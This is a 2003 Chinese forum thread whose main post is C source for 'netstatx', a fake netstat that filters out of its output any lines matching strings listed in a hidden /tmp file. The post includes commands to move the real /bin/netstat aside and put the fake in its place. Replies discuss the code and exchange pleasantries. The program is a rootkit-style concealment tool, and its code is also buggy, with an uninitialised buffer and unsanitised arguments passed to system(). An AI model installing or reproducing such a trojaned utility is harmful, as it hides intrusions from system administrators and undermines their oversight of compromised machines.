|
|
[code:1:029dbd400d]
1) #define LISTOFITEMS "/tmp/.sysproc"
* Put here the strings yout to be hidden, you must create it by your self!
*
* 2) #define TMPOUTFILE "/tmp/.tmp"
* If you wish u can change the TMPOUTFILE but it's not needed.
*
* Compile the file
* Move the real /bin/netstat in /usr/bin/netstat
* Put netstatx in /bin
* For example :
* #gcc netstatx.c -o netstatx
* #mv /bin/netstat /usr/bin/netstat
* #mv netstatx /bin/netstat
* PS: Italian--->
* L'autore si manleva da ogni responsabilit?circa l'uso che terzi possono fare
* del programma in questione. Il programma nasce come esempio di strumento atto
* a nascondere delle stringhe dallo Standard Output.
* CONSIGLIO: Non hackate, ?stupido :>
*/
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <string.h>
#include <stdio.h>
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <ctype.h>
#define READBUFFERLEN 512
#define LISTOFITEMS "/tmp/.sysproc" //this is the file where u have to put the strings u wish to be hidden
#define TMPOUTFILE "/tmp/.tmp" //U can modify here, if u want
#define new(p) ( p * )malloc(sizeof ( p ))
unsigned char filter (char *big , char *lil ) ;
// Hiding
struct ItemList
{
char *item ;
struct ItemList *next ;
} ;
// Aggiunge una stringa di path alla lista
// Ritorna 0 se c'e' errore
// 1 altrimenti
unsigned char AddItemToHide (struct ItemList **p, char *str)
{
struct ItemList *ptr ;
unsigned int len ;
if (!str)
return 0 ;
ptr = new ( struct ItemList ) ;
ptr->next = *p ;
len = strlen(str) ;
ptr->item = (char *) malloc (len-1) ;
strncpy(ptr->item,str,len-1);
*p = ptr ;
return 1 ;
}
// Distruttore della lista
void Destroy (struct ItemList **p)
{
if (!(*p))
return ;
if ((*p)->next)
{
free((*p)->item) ;
Destroy(&((*p)->next)) ;
}
free (*p) ;
}
// Trova un item nella lista * non serve x ora
unsigned int FindItem ( struct ItemList *p , char *item )
{
struct ItemList *ptr ;
int len ;
if ( !p || !item )
return 0 ;
ptr = p ;
while (ptr)
{
if ( !strcmp(item,ptr->item) )
return 1 ;
ptr = ptr->next ;
}
return 0 ;
}
// carica il conenuto del file puntato da path
// nella struttura puntata da p
// ritorna i files nascosti in caso di successo , 0 altrimenti
unsigned long LoadHideList (char *path, struct ItemList **p )
{
FILE *fp ;
char buffer[READBUFFERLEN] ;
unsigned long count = 0 ;
fp = fopen (path,"r") ;
// se non trovo il file
if ( !fp )
{
printf ("*file not found* : %s\n",path ) ;
return 0 ;
}
while ( !feof ( fp ) )
{
++count ;
fscanf(fp,"%s",buffer );
if ( !isspace ( *buffer ) )
AddItemToHide( p , buffer ) ;
}
fclose(fp) ;
if ( !count )
return 0 ;
else
return count ;
}
// ritorna 1 se la stringa lil e presente in big in forma intera
// Non utilizzato qui
unsigned char filter (char *big , char *lil )
{
char *ptr ; // pointer to the first occurance
char end ;
char begin ;
unsigned char rc ;
if ( !big || ! lil )
return 0 ;
ptr = strstr(big,lil) ;
if ( !ptr )
rc = 0 ;
else
{
// se e' l'ultima della riga
end = *(ptr+strlen(lil)) ;
if ( end == '\n' || end == 0x20 || end == 0)
{
if ( ptr != big )
{
begin = *( ptr - 1 ) ;
if ( begin == 0x20 )
rc = 1 ;
else
rc = 0 ;
}
else
rc = 1 ;
}
else
rc = 0 ;
}
return rc ;
}
int main (int argc, char **argv)
{
pid_t pid ;
int i ;
int len=0 ;
int c ;
int size ;
FILE *fp ;
char *strcmd ;
char buffer[READBUFFERLEN] ;
unsigned char found ;
struct ItemList *ItemsToHide = NULL ;
struct ItemList *ptr = NULL ;
// Rikostruisco la lista delle variabili
// rakkatto la dimensione totale della stringa di comando
for ( i = 1 ;i < argc ; i ++ )
len += strlen( argv[i] ) + 1 ;
len += strlen ( "/usr/bin/netstat " );
// e qui la creo
size = ( len + 4 + strlen(TMPOUTFILE) ) * sizeof(char) ;
strcmd = ( char * ) malloc ( size ) ;
strcat ( strcmd , "/usr/bin/netstat " );
for ( i = 1 ; i < argc ; i ++ )
strcat(strcmd,argv[i]);
strcat ( strcmd , " > " ) ;
strcat ( strcmd , TMPOUTFILE ) ;
system ( strcmd );
c = system ( strcmd );
if ( c<0 )
{
system ( "rm /tmp/.tmp" );
return;
}
//carico gli Item da Hidare
LoadHideList (LISTOFITEMS,&ItemsToHide) ;
fp = fopen ( TMPOUTFILE , "r" ) ;
if (!fp)
exit(0);
while (!feof(fp))
{
ptr = ItemsToHide ;
fgets ( buffer , READBUFFERLEN , fp );
for ( found = 0 ; ptr ; ptr = ptr -> next )
if ( strstr ( buffer , ptr->item) )
{
found = 1 ;
break ;
}
if ( ! found )
printf ( "%s",buffer ) ;
}
fclose (fp) ;
system ( "rm /tmp/.tmp" );
free ( strcmd ) ;
if ( ItemsToHide )
Destroy(&ItemsToHide) ;
}
[/code:1:029dbd400d]
__________________  : :
| opcx 回复于:2003-05-23 12:48:35
| 没问题,我一定遵命!!!
不过也请您“蓝色键盘”先生,多到那里给我指点指点呀!!!
发一些好的帖子!!! 先谢谢了!!!
| | 蓝色键盘 回复于:2003-05-23 08:56:35
| opcx ,我看
tp://www.cnean.net/bbs/forumdisplay.php?s=&forumid=40
这个地方好多帖子是你从这里转贴出去的,呵呵
以后有好的东西,你也转回来让大家看看。
| | 蓝色键盘 回复于:2003-05-23 09:19:00
| [code:1:bcc766bf4e]
strcmd = ( char * ) malloc ( size ) ;
strcat ( strcmd , "/usr/bin/netstat " );
for ( i = 1 ; i < argc ; i ++ )
strcat(strcmd,argv[i]);
strcat ( strcmd , " > " ) ;
strcat ( strcmd , TMPOUTFILE ) ;
system ( strcmd );
c = system ( strcmd );
if ( c<0 )
{
system ( "rm /tmp/.tmp" );
return;
}
[/code:1:bcc766bf4e]
看上面的代码,也只是用系统的netstat命令,然后处理重定向参数等问体。
要是能模拟netstat的功能做一个要好的多。
| | hell2000 回复于:2003-05-23 09:46:44
| 新手提问:
在 AddItemToHide中 使用ptr = new ( struct ItemList 
但是 Destroy 中对于 *p使用的是free而不是delete可以吗??
| | 蓝色键盘 回复于:2003-05-23 09:56:35
| 你用c++吧。delete
| | 蓝色键盘 回复于:2003-05-23 17:12:48
| 你那个是你们公司的??
| | opcx 回复于:2003-05-24 17:09:46
| 是呀, 怎么了 ???
| | 无双 回复于:2003-05-24 17:36:03
| 看里面的内容好像是做网络安全方面的
还有潇湘夜雨兄
我想那应该主要是做网络安全的研究吧
| | 无双 回复于:2003-05-24 17:37:15
| 而且版主的注册日期是4/30日
刚成立一个月
你们多多努力吧
| | opcx 回复于:2003-05-24 17:53:12
| 我们一定会努力的,谢谢无双版主的支持!!
| | 无双 回复于:2003-05-24 18:00:47
| 好啊
祝你们早日成功
| |
|
